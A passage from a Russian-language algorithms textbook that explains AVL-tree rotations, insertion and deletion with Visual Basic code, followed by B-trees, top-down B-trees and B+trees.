Например, дерево слева на рис. 7.3 является сбалансированным АВЛдеревом. Если добавить к дереву новый узел E, то получится среднее дерево на рисунке. Затем выполняется проход вверх по дереву от нового узла E. В самом узле E дерево сбалансировано, так как оба его поддерева пустые и имеют одинаковую высоту 0.
В узле D дерево также сбалансировано, так как его левое поддерево пустое, и имеет поэтому высоту 0. Правое поддерево содержит единственный узел E, и поэтому его высота равна 1. Высоты поддеревьев отличаются не больше, чем на единицу, поэтому дерево сбалансировано в узле D.
В узле C дерево уже не сбалансировано. Левое поддерево узла C имеет высоту 0, а правое — высоту 2. Эти поддеревья можно сбалансировать, как показано на рис. 7.3 справа, при этом узел C заменяется узлом D. Теперь поддерево с корнем в узле D содержит узлы C, D и E, и имеет высоту 2. Заметьте, что высота поддерева с корнем в узле C, которое ранее находилось в этом месте, также была равна 2 до вставки нового узла. Так как высота поддерева не изменилась, то дерево также окажется сбалансированным во всех узлах выше D.
Вращения АВЛдеревьев
При вставке узла в АВЛдерево, в зависимости от того, в какую часть дерева добавляется узел, существует четыре варианта балансировки. Эти способы называются правым и левым вращением, и вращением влевовправо и вправовлево, и обозначаются R, L, LR и RL.
Предположим, что в АВЛдерево вставляется новый узел, и теперь дерево становится несбалансированным в узле X, как показано на рис. 7.4. На рисунке изображены только узел X и два его дочерних узла, а остальные части дерева обозначены треугольниками, так как их не требуется рассматривать подробно.
Новый узел может быть вставлен в любое из четырех поддеревьев узла X, изображенных в виде треугольников. Если вы вставляете узел в одно из этих поддеревьев, то для балансировки дерева потребуется выполнить соответствующее вращение. Помните, что иногда балансировка не нужна, если вставка нового узла не нарушает упорядоченность дерева.
Правое вращение
Вначале предположим, что новый узел вставляется в поддерево R на рис. 7.4. В этом случае не нужно изменять два правых поддерева узла X, поэтому их можно объединить, изобразив одним треугольником, как показано на рис. 7.5. Новый узел вставляется в дерево T1, при этом поддерево TA с корнем в узле A становится не менее, чем на два уровня выше, чем поддерево T3.
На самом деле, поскольку до вставки нового узла дерево было АВЛдеревом, то TA должно было быть выше поддерева T3 не больше, чем на один уровень. После вставки одного узла TA должно быть выше поддерева T3 ровно на два уровня.
Также известно, что поддерево T1 выше поддерева T2 не больше, чем на один уровень. Иначе узел X не был бы самым нижним узлом с несбалансированными поддеревьями. Если бы T1 было на два уровня выше, чем T2, то дерево было бы несбалансированным в узле A.
@Рис. 7.4. Анализ несбалансированного АВЛдерева
========158
@Рис. 7.5. Вставка нового узла в поддерево R
В этом случае, можно переупорядочить узлы при помощи правого вращения (right rotation), как показано на рис. 7.6. Это вращение называется правым, так как узлы A и X как бы вращаются вправо.
Заметим, что это вращение сохраняет порядок «меньше» расположения узлов дерева. При симметричном обходе любого из таких деревьев обращение ко всем поддеревьям и узлам дерева происходит в порядке T1, A, T2, X, T3. Поскольку симметричный обход обоих деревьев происходит одинаково, то и порядок расположения элементов в них будет одинаковым.
Важно также заметить, что высота поддерева, с которым мы работаем, остается неизменной. Перед тем, как был вставлен новый узел, высота поддерева была равна высоте поддерева T2 плюс 2. После вставки узла и выполнения правого вращения, высота поддерева также остается равной высоте поддерева T2 плюс 2. Все части дерева, лежащие ниже узла X при этом также остаются сбалансированными, поэтому не требуется продолжать балансировку дерева дальше.
Левое вращение
Левое вращение (left rotation) выполняется аналогично правому. Оно используется, если новый узел вставляется в поддерево L, показанное на рис. 7.4. На рис. 7.7 показано АВЛдерево до и после левого вращения.
@Рис. 7.6. Правое вращение
========159
@Рис. 7.7. До и после левого вращения
Вращение влевовправо
Если узел вставляется в поддерево LR, показанное на рис. 7.4, нужно рассмотреть еще один нижележащий уровень. На рис. 7.8. показано дерево, в котором новый узел вставляется в левую часть T2 поддерева LR. Так же легко можно вставить узел в правое поддерево T3. В обоих случаях, поддеревья TA и TC останутся АВЛподдеревьями, но поддерево TX уже не будет таковым.
Так как дерево до вставки узла было АВЛдеревом, то TA было выше T4 не больше, чем на один уровень. Поскольку добавлен только один узел, то TA вырастет только на один уровень. Это значит, что TA теперь будет точно на два уровня выше T4.
Также известно, что поддерево T2 не более, чем на один уровень выше, чем T3. Иначе TC не было бы сбалансированным, и узел X не был бы самым нижним в дереве узлом с несбалансированными поддеревьями.
Поддерево T1 должно иметь ту же глубину, что и T3. Если бы оно было короче, то поддерево TA было бы не сбалансировано, что снова противоречит предположению о том, что узел X — самый нижний узел в дереве, имеющий несбалансированные поддеревья. Если бы поддерево T1 имело большую глубину, чем T3, то глубина поддерева T1 была бы на 2 уровня больше, чем глубина поддерева T4. В этом случае дерево было бы несбалансированным до вставки в него нового узла.
Все это означает, что нижние части деревьев выглядят в точности так, как показано на рис. 7.8. Поддерево T2 имеет наибольшую глубину, глубина T1 и T3 на один уровень меньше, а T4 расположено еще на один уровень выше, чем T3 и T3.
@Рис. 7.8. Вставка нового узла в поддерево LR
==========160
@Рис. 7.9. Вращение влевовправо
Используя эти факты, можно сбалансировать дерево, как показано на рис. 7.9. Это называется вращением влевовправо (leftright rotation), так как при этом вначале узлы A и C как бы вращаются влево, а затем узлы C и X вращаются вправо.
Как и другие вращения, вращение этого типа не изменяет порядок элементов в дереве. При симметричном обходе дерева до и после вращения обращение к узлам и поддеревьям происходит в порядке: T1, A, T2, C, T3, X, T4.
Высота дерево после балансировки также не меняется. До вставки нового узла, правое поддерево имело высоту поддерева T1 плюс 2. После балансировки дерева, высота этого поддерева снова будет равна высоте T1 плюс 2. Это значит, что остальная часть дерева также остается сбалансированной, и нет необходимости продолжать балансировку дальше.
Вращение вправовлево
Вращение вправовлево (rightleft rotation) аналогично вращению влевовправо (). Оно используется для балансировки дерева после вставки узла в поддерево RL на рис. 7.4. На рис. 7.10 показано АВЛдерево до и после вращения вправовлево.
Резюме
На рис. 7.11 показаны все возможные вращения АВЛдерева. Все они сохраняют порядок симметричного обхода дерева, и высота дерева при этом всегда остается неизменной. После вставки нового элемента и выполнения соответствующего вращения, дерево снова оказывается сбалансированным.
Вставка узлов на языке Visual Basic
Перед тем, как перейти к обсуждению удаления узлов из АВЛдеревьев, в этом разделе обсуждаются некоторые детали реализации вставки узла в АВЛдерево на языке Visual Basic.
Кроме обычных полей LeftChild и RightChild, класс AVLNode содержит также поле Balance, которое указывает, которое из поддеревьев узла выше. Его значение равно -1, если левое поддерево выше, 1 — если выше правое, и 0 — если оба поддерева имеют одинаковую высоту.
======161
@Рис. 7.10. До и после вращения вправовлево
Public LeftChild As AVLNode
Public RightChild As AVLNode
Public Balance As Integer
Чтобы сделать код более простым для чтения, можно использовать постоянные LEFT_HEAVY, RIGHT_HEAVY, и BALANCED для представления этих значений.
Global Const LEFT_HEAVY = -1
Global Const BALANCED = 0
Global Const RIGHT_HEAVY = 1
Процедура InsertItem, представленная ниже, рекурсивно спускается вниз по дереву в поиске нового местоположения элемента. Когда она доходит до нижнего уровня дерева, она создает новый узел и вставляет его в дерево.
Затем процедура InsertItem использует восходящую рекурсию для балансировки дерева. При выходе из рекурсивных вызовов процедуры, она движется назад по дереву. При каждом возврате из процедуры, она устанавливает параметр has_grown, чтобы определить, увеличилась ли высота поддерева, которое она покидает. В экземпляре процедуры InsertItem, который вызвал этот рекурсивный вызов, процедура использует этот параметр для определения того, является ли проверяемое дерево несбалансированным. Если это так, то процедура применяет для балансировки дерева соответствующее вращение.
Предположим, что процедура в настоящий момент обращается к узлу X. Допустим, что она перед этим обращалась к правому поддереву снизу от узла X и что параметр has_grown равен true, означая, что правое поддерево увеличилось. Если поддеревья узла X до этого имели одинаковую высоту, тогда правое поддерево станет теперь выше левого. В этой точке дерево сбалансировано, но поддерево с корнем в узле X выросло, так как выросло его правое поддерево.
Если левое поддерево узла X вначале было выше, чем правое, то левое и правое поддеревья теперь будут иметь одинаковую высоту. Высота поддерева с корнем в узле X не изменилась — она попрежнему равна высоте левого поддерева плюс 1. В этом случае процедура InsertItem установит значение переменной has_grown равным false, показывая, что дерево сбалансировано.
========162
@Рис. 7.11 Различные вращения АВЛдерева
======163
В конце концов, если правое поддерево узла X было первоначально выше левого, то вставка нового узла делает дерево несбалансированным в узле X. Процедура InsertItem вызывает подпрограмму RebalanceRigthGrew для балансировки дерева. Процедура RebalanceRigthGrew выполняет левое вращение или вращение вправовлево, в зависимости от ситуации.
Если новый элемент вставляется в левое поддерево, то подпрограмма InsertItem выполняет аналогичную процедуру.
Public Sub InsertItem(node As AVLNode, parent As AVLNode, _
txt As String, has_grown As Boolean)
Dim child As AVLNode
' Если это нижний уровень дерева, поместить
' в родителя указатель на новый узел.
If parent Is Nothing Then
Set parent = node
parent.Balance = BALANCED
has_grown = True
Exit Sub
End If
' Продолжить с левым и правым поддеревьями.
If txt <= parent.Box.Caption Then
' Вставить потомка в левое поддерево.
Set child = parent.LeftChild
InsertItem node, child, txt, has_grown
Set parent.LeftChild = child
' Проверить, нужна ли балансировка. Она будет
' не нужна, если вставка узла не нарушила
' балансировку дерева или оно уже было сбалансировано
' на более глубоком уровне рекурсии. В любом случае
' значение переменной has_grown будет равно False.
If Not has_grown Then Exit Sub
If parent.Balance = RIGHT_HEAVY Then
' Перевешивала правая ветвь, теперь баланс
' восстановлен. Это поддерево не выросло,
' поэтому дерево сбалансировано.
parent.Balance = BALANCED
has_grown = False
ElseIf parent.Balance = BALANCED Then
' Было сбалансировано, теперь перевешивает левая ветвь.
' Поддерево все еще сбалансировано, но оно выросло,
' поэтому необходимо продолжить проверку дерева.
parent.Balance = LEFT_HEAVY
Else
' Перевешивала левая ветвь, осталось несбалансировано.
' Выполнить вращение для балансировки на уровне
' этого узла.
RebalanceLeftGrew parent
has_grown = False
End If ' Закончить проверку балансировки этого узла.
Else
' Вставить потомка в правое поддерево.
Set child = parent.RightChild
InsertItem node, child, txt, has_grown
Set parent.RightChild = child
' Проверить, нужна ли балансировка. Она будет
' не нужна, если вставка узла не нарушила
' балансировку дерева или оно уже было сбалансировано
' на более глубоком уровне рекурсии. В любом случае
' значение переменной has_grown будет равно False.
If Not has_grown Then Exit Sub
If parent.Balance = LEFT_HEAVY Then
' Перевешивала левая ветвь, теперь баланс
' восстановлен. Это поддерево не выросло,
' поэтому дерево сбалансировано.
parent.Balance = BALANCED
has_grown = False
ElseIf parent.Balance = BALANCED Then
' Было сбалансировано, теперь перевешивает правая
' ветвь. Поддерево все еще сбалансировано,
' но оно выросло, поэтому необходимо продолжить
' проверку дерева.
parent.Balance = RIGHT_HEAVY
Else
' Перевешивала правая ветвь, осталось несбалансировано.
' Выполнить вращение для балансировки на уровне
' этого узла.
RebalanceRightGrew parent
has_grown = False
End If ' Закончить проверку балансировки этого узла.
End If ' End if для левого поддерева else правое поддерево.
End Sub
========165
Private Sub RebalanceRightGrew(parent As AVLNode)
Dim child As AVLNode
Dim grandchild As AVLNode
Set child = parent.RightChild
If child.Balance = RIGHT_HEAVY Then
' Выполнить левое вращение.
Set parent.RightChild = child.LeftChild
Set child.LeftChild = parent
parent.Balance = BALANCED
Set parent = child
Else
' Выполнить вращение вправовлево.
Set grandchild = child.LeftChild
Set child.LeftChild = grandchild.RightChild
Set grandchild.RightChild = child
Set parent.RightChild = grandchild.LeftChild
Set grandchild.LeftChild = parent
If grandchild.Balance = RIGHT_HEAVY Then
parent.Balance = LEFT_HEAVY
Else
parent.Balance = BALANCED
End If
If grandchild.Balance = LEFT_HEAVY Then
child.Balance = RIGHT_HEAVY
Else
child.Balance = BALANCED
End If
Set parent = grandchild
End If ' End if для правого вращения else двойное правое
' вращение.
parent.Balance = BALANCED
End Sub
Удаление узла из АВЛдерева
В 6 главе было показано, что удалить элемент из упорядоченного дерева сложнее, чем вставить его. Если удаляемый элемент имеет всего одного потомка, можно заменить его этим потомком, сохранив при этом порядок дерева. Если у дерева два дочерних узла, то он заменяется на самый правый узел в левой ветви дерева. Если у этого узла существует левый потомок, то этот левый потомок также занимает его место.
======166
Так как АВЛдеревья являются особым типом упорядоченных деревьев, то для них нужно выполнить те же самые шаги. Тем не менее, после их завершения необходимо вернуться назад по дереву, чтобы убедиться в том, что оно осталось сбалансированным. Если найдется узел, для которого не выполняется свойство АВЛдеревьев, то нужно выполнить для балансировки дерева соответствующее вращение. Хотя это те же самые вращения, которые использовались раньше для вставки узла в дерево, они применяются в других случаях.
Левое вращение
Предположим, что мы удаляем узел из левого поддерева узла X. Также предположим, что правое поддерево либо уравновешено, либо высота его правой половины на единицу больше, чем высота левой. Тогда левое вращение, показанное на рис. 7.12, приведет к балансировке дерева в узле X.
Нижний уровень поддерева T2 закрашен серым цветом, чтобы показать, что поддерево TB либо уравновешено (T2 и T3 имеют одинаковую высоту), либо его правая половина выше (T3 выше, чем T2). Другими словами, закрашенный уровень может существовать в поддереве T2 или отсутствовать.
Если T2 и T3 имеют одинаковую высоту, то высота поддерева TX с корнем в узле X не меняется после удаления узла. Высота TX при этом остается равной высоте поддерева T2 плюс 2. Так как эта высота не меняется, то дерево выше этого узла остается сбалансированным.
Если T3 выше, чем T2, то поддерево TX становится ниже на единицу. В этом случае, дерево может быть несбалансированным выше узла X, поэтому необходимо продолжить проверку дерева, чтобы определить, выполняется ли свойство АВЛдеревьев для предков узла X.
Вращение вправовлево
Предположим теперь, что узел удаляется из левого поддерева узла X, но левая половина правого поддерева выше, чем правая. Тогда для балансировки дерева нужно использовать вращение вправовлево, показанное на рис. 7.13.
Если левое или правое поддеревья T2 или T3 выше, то вращение вправовлево приведет к балансировке поддерева TX, и уменьшит при этом высоту TX на единицу. Это значит, что дерево выше узла X может быть несбалансированным, поэтому необходимо продолжить проверку выполнения свойства АВЛдеревьев для предков узла X.
@Рис. 7.12. Левое вращение при удалении узла
========167
@Рис. 7.13. Вращение вправовлево при удалении узла
Другие вращения
Остальные вращения выполняются аналогично. В этом случае удаляемый узел находится в правом поддереве узла X. Эти четыре вращения — те же самые, которые использовались для балансировки дерева при вставке узла, за одним исключением.
Если новый узел вставляется в дерево, то первое выполняемое вращение осуществляет балансировку поддерева TX, не изменяя его высоту. Это значит, что дерево выше узла TX будет при этом оставаться сбалансированным. Если же эти вращения используются после удаления узла из дерева, то вращение может уменьшить высоту поддерева TX на единицу. В этом случае, нельзя быть уверенным, что дерево выше узла X осталось сбалансированным. Нужно продолжить проверку выполнения свойства АВЛдеревьев вверх по дереву.
Реализация удаления узлов на языке Visual Basic
Подпрограмма DeleteItem удаляет элементы из дерева. Она рекурсивно спускается по дереву в поиске удаляемого элемента и когда она находит искомый узел, то удаляет его. Если у этого узла нет потомков, то процедура завершается. Если есть только один потомок, то процедура заменяет узел его потомком.
Если узел имеет двух потомков, процедура DeleteItem вызывает процедуру ReplaceRightMost для замены искомого узла самым правым узлом в его левой ветви. Процедура ReplaceRightMost выполняется примерно так же, как и процедура из 6 главы, которая удаляет элементы из обычного (неупорядоченного) дерева. Основное отличие возникает при возврате из процедуры и рекурсивном проходе вверх по дереву. При этом процедура ReplaceRightMost использует восходящую рекурсию, чтобы убедиться, что дерево остается сбалансированным для всех узлов.
При каждом возврате из процедуры, экземпляр процедуры ReplaceRightMost вызывает подпрограмму RebalanceRightShrunk, чтобы убедиться, что дерево в этой точке сбалансировано. Так как процедура ReplaceRightMost опускается по правой ветви, то она всегда использует для выполнения балансировки подпрограмму RebalanceRightShrunk, а не RebalanceLeftShrunk.
При первом вызове подпрограммы ReplaceRightMost процедура DeleteItem направляет ее по левой от удаляемого узла ветви. При возврате из первого вызова подпрограммы ReplaceRightMost, процедура DeleteItem использует подпрограмму RebalanceLeftShrunk, чтобы убедиться, что дерево сбалансировано в этой точке.
=========168
После этого, один за другим происходят рекурсивные возвраты из процедуры DeleteItem при проходе дерева в обратном направлении. Так же, как и процедура ReplaceRightmost, процедура DeleteItem вызывает подпрограммы RebalanceRightShrunk или RebalanceLeftShrunk в зависимости от того, по какому пути происходит спуск по дереву.
Подпрограмма RebalanceLeftShrunk аналогична подпрограмме RebalanceRightShrunk, поэтому она не показана в следующем коде.
Public Sub DeleteItem(node As AVLNode, txt As String, shrunk As Boolean)
Dim child As AVLNode
Dim target As AVLNode
If node Is Nothing Then
Beep
MsgBox "Элемент " & txt & " не содержится в дереве."
shrunk = False
Exit Sub
End If
If txt < node.Box.Caption Then
Set child = node.LeftChild
DeleteItem child, txt, shrunk
Set node.LeftChild = child
If shrunk Then RebalanceLeftShrunk node, shrunk
ElseIf txt > node.Box.Caption Then
Set child = node.RightChild
DeleteItem child, txt, shrunk
Set node.RightChild = child
If shrunk Then RebalanceRightShrunk node, shrunk
Else
Set target = node
If target.RightChild Is Nothing Then
' Потомков нет или есть только правый.
Set node = target.LeftChild
shrunk = True
ElseIf target.LeftChild Is Nothing Then
' Есть только правый потомок.
Set node = target.RightChild
shrunk = True
Else
' Есть два потомка.
Set child = target.LeftChild
ReplaceRightmost child, shrunk, target
Set target.LeftChild = child
If shrunk Then RebalanceLeftShrunk node, shrunk
End If
End If
End Sub
Private Sub ReplaceRightmost(repl As AVLNode, shrunk As Boolean, target As AVLNode)
Dim child As AVLNode
If repl.RightChild Is Nothing Then
target.Box.Caption = repl.Box.Caption
Set target = repl
Set repl = repl.LeftChild
shrunk = True
Else
Set child = repl.RightChild
ReplaceRightmost child, shrunk, target
Set repl.RightChild = child
If shrunk Then RebalanceRightShrunk repl, shrunk
End If
End Sub
Private Sub RebalanceRightShrunk(node As AVLNode, shrunk As Boolean)
Dim child As AVLNode
Dim child_bal As Integer
Dim grandchild As AVLNode
Dim grandchild_bal As Integer
If node.Balance = RIGHT_HEAVY Then
' Правая часть перевешивала, теперь баланс восстановлен.
node.Balance = BALANCED
ElseIf node.Balance = BALANCED Then
' Было сбалансировано, теперь перевешивает левая часть.
node.Balance = LEFT_HEAVY
shrunk = False
Else
' Левая часть перевешивала, теперь не сбалансировано.
Set child = node.LeftChild
child_bal = child.Balance
If child_bal <= 0 Then
' Правое вращение.
Set node.LeftChild = child.RightChild
Set child.RightChild = node
If child_bal = BALANCED Then
node.Balance = LEFT_HEAVY
child.Balance = RIGHT_HEAVY
shrunk = False
Else
node.Balance = BALANCED
child.Balance = BALANCED
End If
Set node = child
Else
' Вращение влевовправо.
Set grandchild = child.RightChild
grandchild_bal = grandchild.Balance
Set child.RightChild = grandchild.LeftChild
Set grandchild.LeftChild = child
Set node.LeftChild = grandchild.RightChild
Set grandchild.RightChild = node
If grandchild_bal = LEFT_HEAVY Then
node.Balance = RIGHT_HEAVY
Else
node.Balance = BALANCED
End If
If grandchild_bal = RIGHT_HEAVY Then
child.Balance = LEFT_HEAVY
Else
child.Balance = BALANCED
End If
Set node = grandchild
grandchild.Balance = BALANCED
End If
End If
End Sub
Программа AVL оперирует АВЛдеревом. Введите текст и нажмите на кнопку Add, чтобы добавить элемент к дереву. Введите значение, и нажмите на кнопку Remove, чтобы удалить этот элемент из дерева. На рис. 7.14 показана программа AVL.
Бдеревья
Бдеревья (Btrees) являются другой формой сбалансированных деревьев, немного более наглядной, чем АВЛдеревья. Каждый узел в Бдереве может содержать несколько ключей данных и несколько указателей на дочерние узлы. Поскольку каждый узел содержит несколько элементов, такие узлы иногда называются блоками.
=======171
@Рис. 7.14. Программа AVL
Между каждой парой соседних указателей находится ключ, который можно использовать для определения ветви, по которой нужно следовать при вставке или поиске элемента. Например, в дереве, показанном на рис. 7.15, корневой узел содержит два ключа: G и R. Чтобы найти элемент со значением, которое идет перед G, нужно искать в первой ветви. Чтобы найти элемент, имеющий значение между G и R, проверяется вторая ветвь. Чтобы найти элемент, который следует за R, выбирается третья ветвь.
Бдерево порядка K обладает следующими свойствами:
Каждый узел содержит не более 2 * K ключей.
Каждый узел, кроме может быть корневого, содержит не менее K ключей.
Внутренний узел, имеющий M ключей, имеет M + 1 дочерних узлов.
Все листья дерева находятся на одном уровне.
Бдерево на рис. 7.15 имеет 2 порядок. Каждый узел может иметь до 4 ключей. Каждый узел, кроме может быть корневого, должен иметь не менее двух ключей. Для удобства, узлы Бдерева обычно имеют четное число ключей, поэтому порядок дерева обычно является целым числом.
Выполнение требования, чтобы каждый узел Бдерева порядка K содержал от K до 2 * K ключей, поддерживает дерево сбалансированным. Так как каждый узел должен иметь не менее K ключей, он должен при этом иметь не менее K + 1 дочерних узлов, поэтому дерево не может стать слишком высоким и тонким. Наибольшая высота Бдерева, содержащего N узлов, может быть равна O(logK+1(N)). Это означает, что сложность алгоритма поиска в таком дереве порядка O(log(N)). Хотя это и не так очевидно, операции вставки и удаления элемента из Бдерева также имеют сложность порядка O(log(N)).
@Рис. 7.15. Бдерево
=======172
Производительность Бдеревьев
Применение Бдеревьев особенно полезно при разработке больших приложений, работающих с базами данных. При достаточно большом порядке Бдерева, любой элемент в дереве можно найти после проверки всего нескольких узлов. Например, высота Бдерева 10 порядка, содержащего миллион записей, не может быть больше log11(1.000.000), или выше шести уровней. Чтобы найти определенный элемент, потребуется проверить не более шести узлов.
Сбалансированное двоичное дерево с миллионом элементов имело бы высоту log2(1.000.000), или около 20. Тем не менее, узлы двоичного дерева содержат всего по одному ключевому значению. Для поиска элемента в двоичном дереве, пришлось бы проверить 20 узлов и 20 значений. Для поиска элемента в Бдереве пришлось бы проверить 5 узлов и 100 ключей.
Применение Бдеревьев может обеспечить более высокую скорость работы, если проверка ключей выполняется относительно просто, в отличие от проверки узлов. Например, если база данных находится на диске, чтение данных с диска может происходить достаточно медленно. Когда же данные находятся в памяти, их проверка может происходить очень быстро.
Чтение данных с диска происходит большими блоками, и считывание целого блока занимает столько же времени, сколько и чтение одного байта. Если узлы Бдерева не слишком велики, то чтение узла Бдерева с диска займет не больше времени, чем чтение узла двоичного дерева. В этом случае, для поиска 5 узлов в Бдереве потребуется выполнить 5 медленных обращений к диску, плюс 100 быстрых обращений к памяти. Поиск 20 узлов в двоичном дереве потребует 20 медленных обращений к диску и 20 быстрых обращений к памяти, при этом поиск в двоичном дереве будет более медленным, поскольку время, затраченное на 15 лишних обращений к диску будет намного больше, чем сэкономленное время 80 обращений к памяти. Вопросы, связанные с обращением к диску, позднее обсуждаются в этой главе более подробно.
Вставка элементов в Бдерево
Чтобы вставить новый элемент в Бдерево, найдем лист, в который он должен быть помещен. Если этот узел содержит менее, чем 2 * K ключей, то в этом узле остается место для добавления нового элемента. Вставим новый узел на место так, чтобы порядок элементов внутри узла не нарушился.
Если узел уже содержит 2 * K элементов, то места для нового элемента в узле уже не остается. Разобьем тогда узел на два новых узла, поместив в каждый из них K элементов в правильном порядке. Затем средний элемент переместим в родительский узел.
Например, предположим, что мы хотим поместить новый элемент Q в Бдерево, показанное на рис. 7.15. Этот новый элемент должен находиться во втором листе, который уже заполнен. Для разбиения этого узла, разделим элементы J, K, L, N и Q между двумя новыми узлами. Поместим элементы J и K в левый узел, а элементы N и Q — в правый. Затем переместим средний элемент, L в родительский узел. На рис. 7.16 показано новое дерево.
@Рис. 7.16. Бдерево после вставки элемента Q
=========173
Разбиение узла на два называется разбиением блока. Когда оно происходит, к родительскому узлу добавляется новый ключ и новый указатель. Если родительский узел уже заполнен, то это также может привести к его разбиению. Это, в свою очередь, потребует добавления новой записи на более высоком уровне и так далее. В наихудшем случае, вставка элемента вызовет «цепную реакцию», которая приведет к изменениям на всех вышележащих уровнях вплоть до разбиения корневого узла.
Когда происходит разбиение корневого узла, Бдерево становится выше. Это единственный случай, при котором его высота увеличивается. Поэтому Бдеревья обладают необычным свойством — они всегда растут от листьев к корню.
Удаление элементов из Бдерева
Теоретически, удалить узел из Бдерева так же просто, как и вставить его. На практике, детали этого процесса достаточно сложны.
Если удаляемый узел не является листом, то его нужно заменить другим элементом, чтобы сохранить порядок элементов. Это похоже на случай удалений элемента из упорядоченного дерева или АВЛдерева и его можно обрабатывать аналогично. Заменим элемент самым крайним правым элементом из левой ветви. Этот элемент всегда будет листом. После замены элемента, можно просто считать, что вместо него просто удален заменивший его лист.
Чтобы удалить элемент из листа, вначале нужно при необходимости сдвинуть все другие элементы влево, чтобы заполнить образовавшееся пространство. Помните, что каждый узел в Бдереве порядка K должен иметь от K до 2 * K элементов. После удаления элемента из листа, может оказаться, что он содержит всего K - 1 элементов.
В этом случае, можно попробовать взять несколько элементов из узлов на том же уровне. Затем можно распределить элементы в двух узлах так, чтобы они оба имели не меньше K элементов. На рис. 7.17 элемент удаляется из самого левого листа дерева, при этом в нем остается всего один элемент. После перераспределения элементов между узлом и правым узлом на том же уровне, оба узла имеют не меньше двух ключей. Заметьте, что средний элемент J перемещается в родительский узел.
@Рис. 7.17. Балансировка после удаления элемента
=======174
@Рис. 7.18. Слияние после удаления элемента
При попытке сбалансировать дерево таким образом, может оказаться, что соседний узел на том же уровне содержит всего K элементов. Тогда два узла вместе содержат всего 2 * K - 1 элементов, что недостаточно для заполнения двух узлов. В этом случае, все элементы из обоих узлов могут поместиться в одном узле, поэтому их можно слить. Удалим ключ, который отделяет два узла от родителя. Поместим этот элемент и 2 * K - 1 элементов из двух узлов в один общий узел. Этот процесс называется слиянием узлов (bucket merge или bucket join). На рис. 7.18 показано слияние двух узлов.
При слиянии двух узлов, из родительского узла удаляется ключ, при этом в родительском узле может остаться K - 1 элементов. В этом случае, может потребоваться балансировка или слияние родителя с одним из узлов на его уровне. Это также может привести к тому, что в узле на более высоком уровне также останется K - 1 элементов, и процесс повторится. В наихудшем случае, удаление приведет к «цепной реакции» слияний блоков, которая может дойти до корневого узла.
При удалении последнего элемента из корневого узла, два его оставшихся дочерних узла сливаются, образуя новый корень, и дерево при этом становится короче на один уровень. Единственный способ уменьшения высоты Бдерева — слияние двух дочерних узлов корня и образование нового корня.
Программа Btree позволяет вам оперировать Бдеревом. Введите текст, и нажмите на кнопку Add, чтобы добавить элемент в дерево. Для удаления элемента введите его значение и нажмите на кнопку Remove. На рис. 7.19 показано окно программы Btree с Бдеревом 2 порядка.
@Рис. 7.19. Программа Btree
========175
Разновидности Бдеревьев
Существует несколько разновидностей Бдеревьев, из которых здесь описаны только некоторые. Нисходящие Бдеревья (topdown Btrees) немного иначе управляют структурой Бдерева. За счет разбиения встречающихся полных узлов, эта разновидность алгоритма использует при вставке элементов более наглядную нисходящую рекурсию вместо восходящей. Эта также уменьшает вероятность возникновения длительной последовательности разбиений блоков.
Другой разновидностью Бдеревьев являются Б+деревья (B+trees). В Б+деревьях внутренние узлы содержат только ключи данных, а сами записи находятся в листьях. Это позволяет Б+деревьям хранить в каждом блоке больше элементов, поэтому такие деревья короче, чем соответствующие Бдеревья.
Нисходящие Бдеревья
Подпрограмма, которая добавляет новый элемент в Бдерево, вначале выполняет рекурсивный поиск по дереву, чтобы найти блок, в который его нужно поместить. Когда она пытается вставить новый элемент на его место, ей может понадобиться разбить блок и переместить один из элементов узла в его родительский узел.
При возврате из рекурсивных вызовов процедуры, вызывающая процедура проверяет, требуется ли разбиение родительского узла. Если да, то элемент помещается в родительский узел. При каждом возврате из рекурсивного вызова, вызывающая процедура должна проверять, не требуется ли разбиение следующего предка. Так как эти разбиения блоков происходят при возврате из рекурсивных вызовов процедура, это восходящая рекурсия, поэтому иногда Бдеревья, которыми манипулируют таким образом, называются восходящими Бдеревьями (bottomup Btrees).
Другая стратегия состоит в том, чтобы разбивать все полные узлы, которые встречаются процедуре на пути вниз по дереву. При поиске блока, в который нужно поместить новый элемент, процедура разбивает все повстречавшиеся полные узлы. При каждом разбиении узла, она помещает один из его элементов в родительский узел. Так как она уже разбила все выше расположенные полные узлы, то в родительском узле всегда есть место для нового элемента.
Когда процедура доходит до листа, в который нужно поместить элемент, то в его родительском узле всегда есть свободное место, и если программе нужно разбить лист, то всегда можно поместить средний элемент в родительский узел. Так как при этом процедура работает с деревом сверху вниз, Бдеревья такого типа иногда называются нисходящими Бдеревьями (topdown Btrees).
При этом разбиение блоков происходит чаще, чем это абсолютно необходимо. В нисходящем Бдереве полный узел разбивается, даже если в его дочерних узлах достаточно много свободного места. За счет предварительного разбиения узлов, при использовании нисходящего метода в дереве содержится больше пустого пространства, чем в восходящем Бдереве. С другой стороны, такой подход уменьшает вероятность возникновения длительной последовательности разбиений блоков.
К сожалению, не существует нисходящей версии для слияния узлов. При продвижении вниз по дереву, процедура удаления узлов не может объединять встречающиеся наполовину пустые узлы, потому что в этот момент еще неизвестно, нужно ли будет объединить два дочерних узла и удалить элемент из их родителя. Так как неизвестно также, будет ли удален элемент из родительского узла, то нельзя заранее сказать, потребуется ли слияние родителя с одним из узлов, находящимся на том же уровне.
==========176
Б+деревья
Б+деревья часто используются для хранения больших записей. Типичное Бдерево может содержать записи о сотрудниках, каждая из которых может занимать несколько килобайт памяти. Записи могли бы располагаться в Бдереве в соответствии с ключевым полем, например фамилией сотрудника или его идентификационным номером.
В этом случае упорядочение элементов может быть достаточно медленным. Чтобы слить два блока, программе может понадобиться переместить множество записей, каждая из которых может быть достаточно большой. Аналогично, для разбиения блока может потребоваться переместить множество записей большого объема.
Чтобы избежать перемещения больших блоков данных, программа может записывать во внутренних узлах Бдерева только ключи. При этом узлы также содержат ссылки на сами записи данных, которые записаны в другом месте. Теперь, если программе требуется переупорядочить блоки, то нужно переместить только ключи и указатели, а не сами записи. Этот тип Бдерева называется Б+деревом (B+tree).
То, что элементы в Б+дереве достаточно малы, также позволяет программе хранить больше ключей в каждом узле. При том же размере узла, программа может увеличить порядок дерева и сделать его более коротким.
Например, предположим, что имеется Бдерево 2 порядка, то есть каждый узел имеет от трех до пяти дочерних узлов. Такое дерево, содержащее миллион записей, должно было бы иметь высоту между log5(1.000.000) и log3(1.000.000), или между 9 и 13. Чтобы найти элемент в таком дереве, программа должна выполнить от 9 до 13 обращений к диску.
